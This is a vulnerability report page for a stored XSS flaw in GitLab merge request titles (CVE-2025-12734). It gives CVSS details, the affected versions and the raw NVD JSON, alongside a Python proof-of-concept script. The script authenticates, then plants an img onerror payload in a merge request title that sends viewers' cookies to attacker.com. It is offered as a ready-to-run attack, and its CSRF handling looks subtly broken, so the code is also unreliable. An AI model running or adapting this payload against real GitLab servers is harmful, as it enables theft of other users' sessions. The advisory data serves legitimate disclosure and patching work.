Security Vulnerability Report
CVE-2025-12734 CVSS 3.5 LOW

Published: 2025-12-11 08:15:51
Last Modified: 2025-12-23 21:02:23

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.6 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to, under certain conditions, render content in dialogs to other users by injecting malicious HTML content into merge request titles.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE 15.6 <= version < 18.4.6
GitLab CE/EE 18.5 <= version < 18.5.4
GitLab CE/EE 18.6 <= version < 18.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12734 GitLab Merge Request Title XSS PoC
# This PoC demonstrates the XSS vulnerability in GitLab Merge Request titles

import requests
import json
from urllib.parse import quote

# Configuration
GITLAB_URL = "https://gitlab.example.com"
USERNAME = "attacker_username"
PASSWORD = "attacker_password"
PROJECT_ID = "your_project_id"

# XSS Payload - steals cookies when rendered in dialog
XSS_PAYLOAD = '''<img src=x onerror=" fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie)) ">'''


def login():
    """Authenticate to GitLab and get session token"""
    session = requests.Session()
    login_url = f"{GITLAB_URL}/users/sign_in"

    # Get CSRF token
    response = session.get(login_url)
    csrf_token = session.cookies.get('_gitlab_session')

    # Login request
    login_data = {
        'user[login]': USERNAME,
        'user[password]': PASSWORD,
        'authenticity_token': csrf_token
    }
    response = session.post(login_url, data=login_data)
    return session if response.status_code == 200 else None


def create_malicious_mr(session):
    """Create Merge Request with XSS payload in title"""
    mr_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/merge_requests"
    mr_data = {
        'title': f"Test MR {XSS_PAYLOAD}",
        'source_branch': 'feature-branch',
        'target_branch': 'main',
        'description': 'Malicious MR for CVE-2025-12734 demonstration'
    }
    response = session.post(mr_url, json=mr_data)
    if response.status_code == 201:
        print(f"[+] Malicious MR created successfully")
        print(f"[+] XSS Payload embedded in title: {XSS_PAYLOAD}")
        print(f"[+] When viewed in dialog, the script will execute")
        return response.json()
    else:
        print(f"[-] Failed to create MR: {response.text}")
        return None


def main():
    print("="*60)
    print("CVE-2025-12734 GitLab Stored XSS PoC")
    print("="*60)

    # Step 1: Login to GitLab
    print("\n[1] Authenticating to GitLab...")
    session = login()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Create malicious MR
    print("\n[2] Creating malicious Merge Request...")
    result = create_malicious_mr(session)
    if result:
        print(f"\n[+] MR IID: {result.get('iid')}")
        print(f"[+] MR URL: {result.get('web_url')}")
        print("\n[!] Attack vector: When any user views this MR in a dialog,")
        print(" the XSS payload will execute in their browser context")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12734", "sourceIdentifier": "[email protected]", "published": "2025-12-11T08:15:51.110", "lastModified": "2025-12-23T21:02:22.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.6 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to, under certain conditions, render content in dialogs to other users by injecting malicious HTML content into merge request titles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "15.6.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "C612892E-D034-429C-BE38-2D7DDFA62F02"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "15.6.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "43AAB62F-9E83-4BBD-85C1-37F85DAA5AC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "457DB333-60BE-44CD-A674-216AB658E14E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", 
"versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "910967DB-0A8C-4436-9D9E-37BD610E7367"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "919A2588-3EA1-4E15-B47E-61B3E14B2781"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "6343A083-3E1C-4551-B230-76CABC3FDD67"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/579573", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3379381", "source": "[email protected]", "tags": ["Permissions Required"]}]}}